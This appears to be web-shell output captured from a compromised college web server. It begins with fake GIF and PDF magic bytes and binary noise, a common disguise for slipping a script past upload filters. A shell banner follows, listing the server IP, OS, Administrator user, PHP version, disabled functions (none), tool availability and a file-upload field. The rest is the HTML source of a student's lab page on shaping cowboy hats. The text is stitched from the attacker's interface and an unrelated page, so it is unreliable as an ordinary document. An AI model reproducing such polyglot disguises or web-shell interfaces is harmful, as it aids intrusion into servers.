GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1021/Labs/Lab14/MMDT1021-MarkieJohnson-Lab14/Lab14/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <title>Final Project - Markie Johnson</title> <meta charset="UTF-8"> <link href="Lab14.css" rel="stylesheet" type="text/css"> </head> <body> <h1>COWBOY HATS</h1> <ul id="nav"> <li><a href="Home.html">Home</a> <li><a href="HatShapes.html">Hat Shapes</a></li> <li><a href="Felt.html">Felt</a></li> <li><a href="PalmLeaf.html">Palm Leaf</a></li> <li><a href="StrawHats.html">Straw</a></li> </ul> <br> <div class="d"> <img src="haybale.jpg" alt="Hat on Haybale"><img src="Hatparts.jpg" alt="Hat Parts"></div> <br><br> <div class="b"> This page will talk to you all about some of the various shapes you can mold your cowboy hat into. Whether it be made of felt, straw, or palm leaf, this page will help you understand the "Why's" and "How's" of shaping a hat. You can either go to a store and get it shaped by a professional or you can do it right from home. Now, cowboy hats have been used for MANY different reasons: <br> <ul class="a"> <li>Style</li> <li>Keeping cool</li> <li>Signaling from a distance</li> <li>Great water bucket for horses</li> <li>Protection from the sun</li> </ul> <br> Most hats have a 1" nylon hatband (some are removeable) and some come with a leather hatband. I think it's safe to say that cowboy hats will ALWAYS be around. Here's a video that'll show you how to shape your own hat at home. </div> <br><br> <div class="d"> <iframe width="560" height="315" src="https://www.youtube.com/embed/gvrQcuLqrPk" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> </div> </body> </html>